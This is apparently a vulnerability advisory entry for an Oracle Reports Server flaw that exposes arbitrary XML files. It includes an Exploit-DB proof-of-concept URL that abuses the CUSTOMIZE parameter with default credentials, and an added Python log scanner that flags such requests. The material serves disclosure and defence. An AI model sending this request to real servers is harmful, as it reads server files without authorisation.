Vendor: Oracle Reports Server
By: SecurityFocus
CVSS: 7.5 HIGH
XML Disclosure
CWE: 200
Product Name: Oracle Reports Server
Affected Version From: All versions
Affected Version To: All versions
Patch Exists: N/A
2005

Oracle Reports Server XML Disclosure Vulnerability

Oracle Reports Server may allow remote attackers to disclose parts of arbitrary XML files. Reportedly, the server fails to restrict users from accessing parts of arbitrary XML files when handling specially crafted HTTP GET requests.

Mitigation:

Restrict access to the Oracle Reports Server and ensure that only trusted users are allowed to access the server.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/14311/info

All versions of Oracle Reports Server are reported to be vulnerable to this issue. 

http://www.example.com:7778/reports/rwservlet?server=myserver+report=test.rdf+userid=scott/tiger@iasdb+destype=cache+desformat=xml+CUSTOMIZE=/opt/ORACLE/ias/oracle/product/9.0.2/webcache/webcache.xml
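
A log check for the request pattern shown above, added here as an example (not part of the original advisory or the Exploit-DB entry): it scans web access log lines for rwservlet requests whose CUSTOMIZE value is not on an allow-list of expected customization files. The log lines, the allow-list entry emp_custom.xml and the function names are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Request line of a common/combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Hypothetical allow-list: customization files the site really uses.
ALLOWED_CUSTOMIZE = {"emp_custom.xml"}

def rwservlet_params(target):
    """Return rwservlet parameters (keys lower-cased), or None for other URLs."""
    path, _, query = target.partition("?")
    if not path.lower().endswith("/rwservlet"):
        return None
    params = {}
    # Parameters may be separated by '+' (as in the advisory URL), '&' or
    # spaces, and may be percent-encoded, so decode first and split on all three.
    for token in re.split(r"[&+\s]+", unquote(query)):
        key, sep, value = token.partition("=")
        if sep:
            params[key.lower()] = value
    return params

def find_customize_hits(log_lines, allowed=ALLOWED_CUSTOMIZE):
    """Return (client_ip, customize_value) for values not on the allow-list."""
    hits = []
    for line in log_lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        params = rwservlet_params(match.group(1))
        if params and "customize" in params and params["customize"] not in allowed:
            hits.append((line.split()[0], params["customize"]))
    return hits

# Constructed sample log lines (documentation IP ranges, made-up timestamps).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /reports/rwservlet?server=myserver+report=test.rdf+destype=cache+desformat=xml+CUSTOMIZE=/opt/ORACLE/ias/oracle/product/9.0.2/webcache/webcache.xml HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2024:10:01:00 +0000] "GET /reports/rwservlet?server=myserver&report=test.rdf&customize=%2Ftmp%2Fconstructed.xml HTTP/1.1" 200 812',
    '192.0.2.44 - - [01/Jan/2024:10:02:00 +0000] "GET /reports/rwservlet?server=myserver+report=test.rdf+customize=emp_custom.xml HTTP/1.1" 200 4096',
    '192.0.2.44 - - [01/Jan/2024:10:03:00 +0000] "GET /index.html HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for ip, value in find_customize_hits(SAMPLE_LOG):
        print(f"{ip} requested CUSTOMIZE={value}")
```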